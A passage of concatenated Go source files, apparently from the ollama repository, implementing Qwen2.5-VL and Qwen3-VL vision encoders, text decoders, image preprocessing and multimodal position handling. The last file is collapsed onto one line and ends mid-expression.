						s[1][i] = int32(x + dx)
						s[2][i] = int32(y + dy)
						s[3][i] = int32(x + dx)

						cur++
					}
				}
			}
		}

		return slices.Concat(s...)
	}(), grid.Height*grid.Width*4)

	mask := blockDiagonalMask(ctx, hiddenStates.Dim(1), bounds)
	// Apply encoder layers
	for i, layer := range m.Layers {
		if slices.Contains(m.fullAttnBlocks, int32(i)) {
			// Designated blocks attend globally (no mask).
			hiddenStates = layer.Forward(ctx, hiddenStates, positions, nil, m.VisionModelOptions)
		} else {
			hiddenStates = layer.Forward(ctx, hiddenStates, positions, mask, m.VisionModelOptions)
		}
	}

	hiddenStates = m.PatchMerger.Forward(ctx, hiddenStates, m.VisionModelOptions)
	// Undo the window permutation so outputs line up with the original grid.
	return hiddenStates.Rows(ctx, windowIndex)
}

// windowIndex divides the grid into windows and returns:
// 1. A slice of grid point indices organized by windows
// 2. A slice of boundaries that mark where each window's data begins and ends
// in the flattened representation, scaled by spatialMergeSize squared
//
// The boundaries slice always starts with 0 and contains cumulative ending
// positions for each window, allowing downstream processing to identify
// window boundaries in the tensor data.
func (m *VisionModel) windowIndex(grid *Grid) (index []int32, bounds []int) {
	height := grid.Height / m.spatialMergeSize
	width := grid.Width / m.spatialMergeSize
	window := m.windowSize / m.patchSize / m.spatialMergeSize

	index = make([]int32, height*width)
	bounds = make([]int, 0, ((height+window-1)/window)*((width+window-1)/window)+1)
	bounds = append(bounds, 0)
	var cur int32
	for y := 0; y < height; y += window {
		for x := 0; x < width; x += window {
			h1 := min(window, height-y)
			w1 := min(window, width-x)
			for dy := range h1 {
				for dx := range w1 {
					win := (y+dy)*width + (x + dx)
					index[win] = cur
					cur++
				}
			}
			// cur counts merged positions; each expands to spatialMergeSize²
			// patches in the sequence the mask is built over. (Previously this
			// multiplied by `window`, which only matched for the default
			// config where window == spatialMergeSize² == 4.)
			bounds = append(bounds, int(cur)*m.spatialMergeSize*m.spatialMergeSize)
		}
	}

	return index, bounds
}

// newVisionModel creates a new instance of the Qwen vision model
func newVisionModel(c fs.Config) *VisionModel {
	patchSize := int(c.Uint("vision.patch_size", 14))
	hiddenSize := int(c.Uint("vision.embedding_length", 1280))
	numHeads := int(c.Uint("vision.attention.head_count", 16))
	numChannels := int(c.Uint("vision.num_channels", 3))
	eps := c.Float("vision.attention.layer_norm_epsilon", 1e-6)
	ropeTheta := c.Float("vision.rope.freq_base", 10000.0)
	spatialMergeSize := int(c.Uint("vision.spatial_merge_size", 2))
	windowSize := int(c.Uint("vision.window_size", 112))
	fullAttnBlocks := c.Ints("qwen25vl.vision.fullatt_block_indexes", []int32{7, 15, 23, 31})
	temporalPatchSize := int(c.Uint("vision.temporal_patch_size", 2))

	model := &VisionModel{
		Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count", 32)),
		VisionModelOptions: &VisionModelOptions{
			hiddenSize:        hiddenSize,
			numHeads:          numHeads,
			headDim:           hiddenSize / numHeads,
			patchSize:         patchSize,
			numChannels:       numChannels,
			eps:               eps,
			ropeTheta:         ropeTheta,
			spatialMergeSize:  spatialMergeSize,
			windowSize:        windowSize,
			temporalPatchSize: temporalPatchSize,
			fullAttnBlocks:    fullAttnBlocks,
		},
	}

	return model
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/model_text.go
model/models/qwen25vl/model_text.go
package qwen25vl

import (
	"math"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/ml/nn/rope"
)

// TextOptions holds the text decoder hyperparameters read from the GGUF
// config.
type TextOptions struct {
	hiddenSize, numHeads, numKVHeads int
	ropeDim, originalContextLength   int
	eps, ropeBase, ropeScale         float32
	mropeSections                    []int
}

// applyRotaryPositionEmbeddings applies multimodal RoPE (M-RoPE), splitting
// the rotary dimensions into the configured sections.
func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor {
	return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, rope.WithMRoPE(o.mropeSections))
}

// TextModel is the Qwen2.5-VL text decoder stack.
type TextModel struct {
	TokenEmbedding *nn.Embedding `gguf:"token_embd"`
	Layers         []Layer       `gguf:"blk"`
	OutputNorm     *nn.RMSNorm   `gguf:"output_norm"`
	Output         *nn.Linear    `gguf:"output,alt:token_embd"`

	*TextOptions

	// positionCache maps sequence indices to M-RoPE positions; it is built in
	// PostTokenize and invalidated by Shift.
	positionCache []int32
}

// NewTextModel constructs the text decoder from GGUF configuration.
func NewTextModel(c fs.Config) *TextModel {
	m := TextModel{
		Layers: make([]Layer, c.Uint("block_count")),
		TextOptions: &TextOptions{
			hiddenSize:            int(c.Uint("embedding_length")),
			numHeads:              int(c.Uint("attention.head_count")),
			numKVHeads:            int(c.Uint("attention.head_count_kv")),
			ropeDim:               int(c.Uint("rope.dimension_count", 128)),
			originalContextLength: int(c.Uint("context_length", 128000)),
			eps:                   c.Float("attention.layer_norm_rms_epsilon"),
			ropeBase:              c.Float("rope.freq_base"),
			ropeScale:             c.Float("rope.scaling.factor", 1),
			// Widen the GGUF int32 section sizes to int for rope.WithMRoPE.
			mropeSections: func() []int {
				sections := c.Ints("rope.mrope_section")
				s := make([]int, len(sections))
				for i, section := range sections {
					s[i] = int(section)
				}
				return s
			}(),
		},
	}

	return &m
}

// SelfAttention implements the multi-head self-attention mechanism
// with separate projections for query, key, value and output transformations
type SelfAttention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_output"`
}

// Forward computes grouped-query attention (numKVHeads <= numHeads) with
// M-RoPE applied to queries and keys, using the KV cache.
func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positionIDs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor {
	batchSize := hiddenState.Dim(1)
	headDim := opts.hiddenSize / opts.numHeads

	q := sa.Query.Forward(ctx, hiddenState)
	q = q.Reshape(ctx, headDim, opts.numHeads, batchSize)
	q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs)

	k := sa.Key.Forward(ctx, hiddenState)
	k = k.Reshape(ctx, headDim, opts.numKVHeads, batchSize)
	k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs)

	v := sa.Value.Forward(ctx, hiddenState)
	v = v.Reshape(ctx, headDim, opts.numKVHeads, batchSize)

	scaleFactor := 1.0 / math.Sqrt(float64(headDim))
	kqv := nn.Attention(ctx, q, k, v, scaleFactor, cache)
	kqv = kqv.Reshape(ctx, opts.hiddenSize, batchSize)

	return sa.Output.Forward(ctx, kqv)
}

// Shift applies rotary position embeddings to the key tensor for causal attention caching
func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) {
	// Shifting invalidates the multimodal position mapping, so drop it.
	m.positionCache = nil
	return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil
}

// MLP implements the feed-forward network component with SwiGLU activation
type MLP struct {
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
	Gate *nn.Linear `gguf:"ffn_gate"`
}

func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextOptions) ml.Tensor {
	// Apply SwiGLU activation gating
	hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState))
	// Project back to hidden dimension
	return mlp.Down.Forward(ctx, hiddenState)
}

// Layer represents a single transformer layer combining self-attention and feed-forward components
type Layer struct {
	AttentionNorm *nn.RMSNorm `gguf:"attn_norm"`
	SelfAttention *SelfAttention
	MLPNorm       *nn.RMSNorm `gguf:"ffn_norm"`
	MLP           *MLP
}

// Forward applies one pre-norm decoder block.
func (l *Layer) Forward(ctx ml.Context, hiddenState, positionIDs, outputs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor {
	// Self-attention branch with residual connection
	residual := hiddenState

	hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positionIDs, cache, opts)

	// In the final layer (outputs != nil), optimize by pruning to just the token positions
	// we need logits for.
	if outputs != nil {
		hiddenState = hiddenState.Rows(ctx, outputs)
		residual = residual.Rows(ctx, outputs)
	}

	hiddenState = hiddenState.Add(ctx, residual)

	// Feed-forward branch with residual connection
	residual = hiddenState
	hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = l.MLP.Forward(ctx, hiddenState, opts)
	return hiddenState.Add(ctx, residual)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/imageprocessor.go
model/models/qwen3vl/imageprocessor.go
package qwen3vl

import (
	"fmt"
	"image"
	"math"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/model/imageproc"
)

// ImageProcessor contains configuration for the Qwen 3 VL image processing
type ImageProcessor struct {
	numChannels       int
	patchSize         int
	temporalPatchSize int
	mergeSize         int
	shortestEdge      int // minimum total pixel area after resize
	longestEdge       int // maximum total pixel area after resize
	factor            int // resize granularity: patchSize * mergeSize
	rescaleFactor     float32
	imageMean         []float32
	imageStd          []float32
}

// newImageProcessor creates a new image processor with default values
func newImageProcessor(c fs.Config) ImageProcessor {
	patchSize := int(c.Uint("vision.patch_size", 14))
	mergeSize := int(c.Uint("vision.spatial_merge_size", 2))
	return ImageProcessor{
		numChannels:       int(c.Uint("vision.num_channels", 3)), // not set
		patchSize:         patchSize,
		temporalPatchSize: 2,
		mergeSize:         mergeSize,
		shortestEdge:      int(c.Uint("vision.shortest_edge", 64<<10)),
		// FIXME(mxyng): the model defined longest edge (16M) is too large for the default
		// context length of 8K and will panic. Adjusting to 2M for now.
		// longestEdge: int(c.Uint("vision.longest_edge", 16<<20)),
		longestEdge:   2 << 20,
		factor:        patchSize * mergeSize,
		rescaleFactor: 1.0 / 255.0,
		imageMean:     c.Floats("vision.image_mean", imageproc.ImageNetStandardMean[:]),
		imageStd:      c.Floats("vision.image_std", imageproc.ImageNetStandardSTD[:]),
	}
}

// SmartResize implements the smart resize algorithm: it rounds each dimension
// to a multiple of factor while keeping the total area within
// [shortestEdge, longestEdge], preserving aspect ratio as closely as possible.
// It panics if either dimension is below factor or the aspect ratio exceeds 200.
func (p *ImageProcessor) SmartResize(height, width int) (int, int) {
	factor := p.factor

	if height < factor || width < factor {
		panic(fmt.Sprintf("height:%d or width:%d must be larger than factor:%d", height, width, factor))
	} else if aspectRatio := max(height, width) / min(height, width); aspectRatio > 200 {
		panic(fmt.Sprintf("absolute aspect ratio must be smaller than 200, got %v", aspectRatio))
	}

	round := func(x float64) int { return int(math.RoundToEven(x)) }

	hBar := round(float64(height)/float64(factor)) * factor
	wBar := round(float64(width)/float64(factor)) * factor

	// Despite the names, shortestEdge/longestEdge bound the total AREA.
	if hBar*wBar > p.longestEdge {
		// Scale down uniformly, flooring so we stay under the limit.
		beta := math.Sqrt(float64(height*width) / float64(p.longestEdge))
		hBar = int(math.Floor(float64(height)/beta/float64(factor))) * factor
		wBar = int(math.Floor(float64(width)/beta/float64(factor))) * factor
	} else if hBar*wBar < p.shortestEdge {
		// Scale up uniformly, ceiling so we reach the minimum.
		beta := math.Sqrt(float64(p.shortestEdge) / float64(height*width))
		hBar = int(math.Ceil(float64(height)*beta/float64(factor))) * factor
		wBar = int(math.Ceil(float64(width)*beta/float64(factor))) * factor
	}

	return hBar, wBar
}

// Grid describes the patch layout of a processed image.
type Grid struct {
	Height   int // number of patches vertically
	Width    int // number of patches horizontally
	Temporal int // number of temporal frames (1 for still images)
}

// ProcessImage converts an image into a normalized patch tensor plus its grid
// dimensions.
func (p *ImageProcessor) ProcessImage(ctx ml.Context, img image.Image) (ml.Tensor, *Grid, error) {
	img = imageproc.Composite(img)

	origWidth := img.Bounds().Dx()
	origHeight := img.Bounds().Dy()

	// Calculate smart resize dimensions
	resizedHeight, resizedWidth := p.SmartResize(origHeight, origWidth)

	// Resize image using existing functions
	resizedImg := imageproc.Resize(img, image.Point{X: resizedWidth, Y: resizedHeight}, imageproc.ResizeBilinear)

	normalizedPixels := imageproc.Normalize(
		resizedImg,
		[3]float32{p.imageMean[0], p.imageMean[1], p.imageMean[2]},
		[3]float32{p.imageStd[0], p.imageStd[1], p.imageStd[2]},
		true, // rescale
		true, // channelFirst
	)

	// Calculate grid dimensions
	grid := &Grid{
		Height:   resizedHeight / p.patchSize,
		Width:    resizedWidth / p.patchSize,
		Temporal: 1, // For single images, temporal dimension is 1
	}

	patches, err := p.createPatches(normalizedPixels, resizedHeight, resizedWidth, grid)
	if err != nil {
		return nil, nil, fmt.Errorf("failed to create patches: %v", err)
	}

	patchDim := p.numChannels * p.temporalPatchSize * p.patchSize * p.patchSize
	numPatches := grid.Temporal * grid.Height * grid.Width
	pixelValues := ctx.Input().FromFloats(patches, patchDim, numPatches)

	// Return patches and grid dimensions
	return pixelValues, grid, nil
}

// createPatches rearranges CHW pixel data into patch order: patches are
// emitted in mergeSize x mergeSize groups so spatially-merged patches are
// contiguous, and the single still-image frame is replicated across the
// temporal dimension.
func (p *ImageProcessor) createPatches(pixels []float32, height, width int, grid *Grid) ([]float32, error) {
	channels := p.numChannels
	patchSize := p.patchSize
	mergeSize := p.mergeSize
	temporalPatchSize := p.temporalPatchSize

	// Calculate output dimensions
	numPatches := grid.Temporal * grid.Height * grid.Width
	patchDim := channels * temporalPatchSize * patchSize * patchSize

	result := make([]float32, numPatches*patchDim)
	patchIndex := 0

	// Single temporal frame handling (copies to all frames)
	for range grid.Temporal {
		for h := 0; h < grid.Height; h += mergeSize {
			for w := 0; w < grid.Width; w += mergeSize {
				// Handle the 2x2 merged patches
				for mh := range mergeSize {
					for mw := range mergeSize {
						baseOffset := patchIndex * patchDim

						// Extract patch data for first temporal frame
						for c := range channels {
							channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize)
							for py := range patchSize {
								for px := range patchSize {
									// Calculate source pixel coordinates
									y := (h+mh)*patchSize + py
									x := (w+mw)*patchSize + px
									// Source index in input tensor (CHW format)
									srcIdx := c*height*width + y*width + x
									// Destination index in first temporal frame
									dstIdx := channelOffset + (py * patchSize) + px
									// Bounds guard; indices are in range when
									// height/width are multiples of factor.
									if srcIdx < len(pixels) && dstIdx < len(result) {
										result[dstIdx] = pixels[srcIdx]
									}
								}
							}
						}

						// Copy first temporal frame to all other frames
						if temporalPatchSize > 1 {
							for c := range channels {
								channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize)
								firstFrameOffset := channelOffset
								frameSize := patchSize * patchSize

								// Copy first frame to all other frames
								for tp := 1; tp < temporalPatchSize; tp++ {
									currentFrameOffset := channelOffset + (tp * frameSize)
									copy(result[currentFrameOffset:currentFrameOffset+frameSize], result[firstFrameOffset:firstFrameOffset+frameSize])
								}
							}
						}

						patchIndex++
					}
				}
			}
		}
	}

	return result, nil
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/model.go
model/models/qwen3vl/model.go
package qwen3vl

import (
	"bytes"
	"image"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/model"
	"github.com/ollama/ollama/model/input"
)

// Model combines the Qwen 3 VL text decoder, vision encoder, and image
// processor.
type Model struct {
	model.Base
	model.TextProcessor

	*TextModel
	*VisionModel `gguf:"v"`

	ImageProcessor

	// positionCache maps sequence indices to M-RoPE positions; built in
	// PostTokenize and dropped on cache shift.
	positionCache []int32
}

// EncodeMultimodal decodes image bytes and runs the vision encoder, returning
// the primary vision embedding (with its Grid as Data) followed by any
// deepstack embeddings.
func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) {
	if len(m.VisionModel.Layers) == 0 {
		return nil, model.ErrNoVisionModel
	}

	img, _, err := image.Decode(bytes.NewReader(multimodalData))
	if err != nil {
		return nil, err
	}

	pixelValues, grid, err := m.ProcessImage(ctx, img)
	if err != nil {
		return nil, err
	}

	// Calculate tensor dimensions
	visionOutputs, deepstackVisualEmbeds := m.VisionModel.Forward(ctx, pixelValues, grid)
	mm := []input.Multimodal{{Tensor: visionOutputs, Data: grid}}
	for i := range deepstackVisualEmbeds {
		mm = append(mm, input.Multimodal{Tensor: deepstackVisualEmbeds[i]})
	}
	return mm, nil
}

// Qwen3-VL special token IDs (fixed in the vocabulary).
var (
	tokenVision      int32 = 151655
	tokenVisionStart int32 = 151652
	tokenVisionEnd   int32 = 151653
)

// modelInput pairs an input with its precomputed M-RoPE base position
// (0 means "continue from the previous position").
type modelInput struct {
	*input.Input
	position int32
}

// PostTokenize arranges Qwen 3 VL's inputs for the forward pass
func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) {
	m.positionCache = m.positionCache[:0]
	return slices.Collect(func(yield func(*input.Input) bool) {
		for i := range inputs {
			s := []modelInput{{Input: inputs[i]}}
			if mm := inputs[i].Multimodal; mm != nil {
				t := mm[0].Tensor
				// Expand to: vision_start + tensor-carrying vision token +
				// placeholder vision tokens + vision_end.
				s = slices.Repeat([]modelInput{
					{
						position: int32(i + 1),
						Input:    &input.Input{Token: tokenVision},
					},
				}, t.Dim(1)+1+1)
				s[0] = modelInput{
					Input:    &input.Input{Token: tokenVisionStart},
					position: int32(i),
				}
				// vision_end resumes after the merged grid width.
				s[len(s)-1] = modelInput{
					Input:    &input.Input{Token: tokenVisionEnd},
					position: int32(i + mm[0].Data.(*Grid).Width/m.spatialMergeSize + 1),
				}
				s[1] = modelInput{
					Input: &input.Input{
						Token:          tokenVision,
						Multimodal:     inputs[i].Multimodal,
						MultimodalHash: inputs[i].MultimodalHash,
						SameBatch:      t.Dim(1),
					},
					position: int32(i + 1),
				}
			}

			for _, e := range s {
				position := e.position
				// Plain text inputs (position 0) continue from the last
				// cached position.
				if position == 0 && len(m.positionCache) > 0 {
					position = m.positionCache[len(m.positionCache)-1] + 1
				}
				m.positionCache = append(m.positionCache, position)
				if !yield(e.Input) {
					return
				}
			}
		}
	}), nil
}

// Forward runs the decoder over a batch, splicing vision embeddings over the
// vision-token placeholders and adding deepstack embeddings into the first
// layers' outputs.
func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
	// ggml mrope requires 4 positions per token: [time, height, width, extra]
	positionSlice := slices.Collect(makeSlice2D[int32](4, len(batch.Positions)))
	for i, id := range batch.Positions {
		// Translate sequence index -> cached position; indices past the cache
		// continue linearly from the cache's last entry.
		if id < int32(len(m.positionCache)) {
			id = m.positionCache[id]
		} else if len(m.positionCache) > 0 {
			id = id - int32(len(m.positionCache)) + m.positionCache[len(m.positionCache)-1] + 1
		}
		positionSlice[0][i] = id
		positionSlice[1][i] = id
		positionSlice[2][i] = id
		// positionSlice[3] is intentionally left as zeros
	}

	hiddenStates := m.TextModel.TokenEmbedding.Forward(ctx, batch.Inputs).Duplicate(ctx)

	var deepstackVisualEmbeds []ml.Tensor
	for _, mi := range batch.Multimodal {
		visionOutputs := mi.Multimodal[0].Tensor
		// Splice the vision embeddings over the placeholder token embeddings.
		ctx.Forward(visionOutputs.Copy(ctx, hiddenStates.View(ctx, mi.Index*hiddenStates.Stride(1), visionOutputs.Dim(0)*visionOutputs.Dim(1))))

		if grid, ok := mi.Multimodal[0].Data.(*Grid); ok {
			for i := range visionOutputs.Dim(1) {
				// Row-major offsets in the merged grid give each vision token
				// its height/width M-RoPE components.
				w := grid.Width / m.spatialMergeSize
				positionSlice[1][mi.Index+i] += int32(i / w)
				positionSlice[2][mi.Index+i] += int32(i % w)
			}
		}

		// Deepstack embeddings are scattered into zero tensors shaped like
		// hiddenStates so they can simply be added after early layers.
		deepstackVisualEmbeds = make([]ml.Tensor, len(mi.Multimodal[1:]))
		for i, mm := range mi.Multimodal[1:] {
			deepstackVisualEmbeds[i] = ctx.Input().Zeros(mm.Tensor.DType(), hiddenStates.Shape()...)
			ctx.Forward(mm.Tensor.Copy(ctx, deepstackVisualEmbeds[i].View(ctx, mi.Index*deepstackVisualEmbeds[i].Stride(1), mm.Tensor.Dim(0)*mm.Tensor.Dim(1))))
		}
	}

	positions := ctx.Input().FromInts(slices.Concat(positionSlice...), len(positionSlice[0])*len(positionSlice))

	for i, layer := range m.TextModel.Layers {
		if m.Cache != nil {
			m.Cache.SetLayer(i)
		}

		// Only the last layer prunes to the output positions.
		var outputs ml.Tensor
		if i == len(m.TextModel.Layers)-1 {
			outputs = batch.Outputs
		}

		hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options)
		if i < len(deepstackVisualEmbeds) {
			hiddenStates = hiddenStates.Add(ctx, deepstackVisualEmbeds[i])
		}
	}

	// NOTE(review): eps is hardcoded here rather than read from config —
	// confirm it matches attention.layer_norm_rms_epsilon for all variants.
	hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, 1e-06)
	return m.Output.Forward(ctx, hiddenStates), nil
}

// New constructs a Qwen 3 VL model (dense or MoE) from GGUF configuration.
func New(c fs.Config) (model.Model, error) {
	m := Model{
		TextProcessor: model.NewBytePairEncoding(
			&model.Vocabulary{
				Values: c.Strings("tokenizer.ggml.tokens"),
				Types:  c.Ints("tokenizer.ggml.token_type"),
				Merges: c.Strings("tokenizer.ggml.merges"),
				AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false),
				BOS:    []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
				AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
				EOS: append(
					[]int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))},
					c.Ints("tokenizer.ggml.eos_token_ids")...,
				),
			},
			`(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`,
		),
		TextModel:      newTextModel(c),
		VisionModel:    newVisionModel(c),
		ImageProcessor: newImageProcessor(c),
	}

	m.Cache = kvcache.NewCausalCache(func(ctx ml.Context, layer int, key, positions ml.Tensor) (ml.Tensor, error) {
		// Shifting invalidates the multimodal position mapping.
		m.positionCache = nil
		// Expand shift positions to the 4-section M-RoPE layout.
		positions = positions.Repeat(ctx, 1, 4).Reshape(ctx, -1)
		return m.Options.applyRotaryPositionEmbeddings(ctx, key, positions), nil
	})

	return &m, nil
}

func init() {
	model.Register("qwen3vl", New)
	model.Register("qwen3vlmoe", New)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/model_vision.go
model/models/qwen3vl/model_vision.go
package qwen3vl import ( "iter" "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type VisionAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_out"` } func rotateHalf(ctx ml.Context, t ml.Tensor) ml.Tensor { x1 := t.Slice(ctx, 0, 0, t.Dim(0)/2, 1) x2 := t.Slice(ctx, 0, t.Dim(0)/2, t.Dim(0), 1).Contiguous(ctx) return x2.Scale(ctx, -1).Concat(ctx, x1, 0) } func applyRotaryPositionEmbeddings(ctx ml.Context, states, cos, sin ml.Tensor) ml.Tensor { return states.Mul(ctx, cos).Add(ctx, rotateHalf(ctx, states).Mul(ctx, sin)) } func (sa *VisionAttention) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts VisionOptions) ml.Tensor { query := sa.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, query.Dim(1)) query = applyRotaryPositionEmbeddings(ctx, query, cos, sin) key := sa.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numHeads, key.Dim(1)) key = applyRotaryPositionEmbeddings(ctx, key, cos, sin) value := sa.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numHeads, value.Dim(1)) attention := nn.Attention(ctx, query, key, value, math.Pow(float64(opts.headDim()), -0.5), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2)) return sa.Output.Forward(ctx, attention) } type VisionMLP struct { FC1 *nn.Linear `gguf:"linear_fc1"` FC2 *nn.Linear `gguf:"linear_fc2"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts VisionOptions) ml.Tensor { return mlp.FC2.Forward(ctx, mlp.FC1.Forward(ctx, hiddenStates).GELU(ctx)) } type VisionEncoderLayer struct { Norm1 *nn.LayerNorm `gguf:"norm1"` Attention *VisionAttention Norm2 *nn.LayerNorm `gguf:"norm2"` MLP *VisionMLP `gguf:"mlp"` } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts 
VisionOptions) ml.Tensor { residual := hiddenStates hiddenStates = e.Norm1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.Attention.Forward(ctx, hiddenStates, cos, sin, opts) hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = e.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type VisionOptions struct { hiddenSize, numHeads, patchSize, numChannels, spatialMergeSize, temporalPatchSize, gridPerSide int eps, ropeTheta float32 deepstackVisualIndexes []int32 mropeSections []int } func (o VisionOptions) headDim() int { return o.hiddenSize / o.numHeads } type VisionPatchMerger struct { Norm *nn.LayerNorm `gguf:"norm"` FC1 *nn.Linear `gguf:"linear_fc1"` FC2 *nn.Linear `gguf:"linear_fc2"` } func (m *VisionPatchMerger) Forward(ctx ml.Context, visionOutputs ml.Tensor, postshuffleNorm bool, opts VisionOptions) ml.Tensor { hiddenSize := opts.hiddenSize * opts.spatialMergeSize * opts.spatialMergeSize if postshuffleNorm { visionOutputs = visionOutputs.Reshape(ctx, hiddenSize, -1) } visionOutputs = m.Norm.Forward(ctx, visionOutputs, opts.eps) visionOutputs = visionOutputs.Reshape(ctx, hiddenSize, -1) return m.FC2.Forward(ctx, m.FC1.Forward(ctx, visionOutputs).GELU(ctx)) } type VisionPositionEmbedding struct { PositionEmbedding *nn.Embedding `gguf:"pos_embed"` } func makeSlice2D[T int32 | float32](n0, n1 int) iter.Seq[[]T] { return func(yield func([]T) bool) { for range n0 { if !yield(make([]T, n1)) { return } } } } func (m *VisionPositionEmbedding) Forward(ctx ml.Context, hiddenStates ml.Tensor, grid *Grid, opts VisionOptions) ml.Tensor { indexSlice := slices.Collect(makeSlice2D[int32](4, grid.Height*grid.Width)) weightSlice := slices.Collect(makeSlice2D[float32](4, grid.Height*grid.Width)) stepHeight := float32(opts.gridPerSide-1) / float32(grid.Height-1) stepWidth := float32(opts.gridPerSide-1) / float32(grid.Width-1) var i int for h := range 
grid.Height { for w := range grid.Width { y, x := float32(h)*stepHeight, float32(w)*stepWidth floorY, floorX := int32(y), int32(x) ceilY, ceilX := min(floorY+1, int32(opts.gridPerSide-1)), min(floorX+1, int32(opts.gridPerSide-1)) indexSlice[0][i] = floorY*int32(opts.gridPerSide) + floorX indexSlice[1][i] = floorY*int32(opts.gridPerSide) + ceilX indexSlice[2][i] = ceilY*int32(opts.gridPerSide) + floorX indexSlice[3][i] = ceilY*int32(opts.gridPerSide) + ceilX weightSlice[0][i] = (1 - (y - float32(floorY))) * (1 - (x - float32(floorX))) weightSlice[1][i] = (1 - (y - float32(floorY))) * (x - float32(floorX)) weightSlice[2][i] = (y - float32(floorY)) * (1 - (x - float32(floorX))) weightSlice[3][i] = (y - float32(floorY)) * (x - float32(floorX)) i++ } } indices := ctx.Input().FromInts(slices.Concat(indexSlice...), grid.Height*grid.Width*4) weights := ctx.Input().FromFloats(slices.Concat(weightSlice...), 1, grid.Height*grid.Width*4) n := hiddenStates.Dim(0) positionEmbeds := m.PositionEmbedding.Forward(ctx, indices) positionEmbeds = positionEmbeds.Mul(ctx, weights) positionEmbeds = positionEmbeds.Reshape(ctx, n, -1, 4) positionEmbedsChunks := positionEmbeds.Chunk(ctx, 2, 1) positionEmbeds = positionEmbedsChunks[0]. Add(ctx, positionEmbedsChunks[1]). Add(ctx, positionEmbedsChunks[2]). 
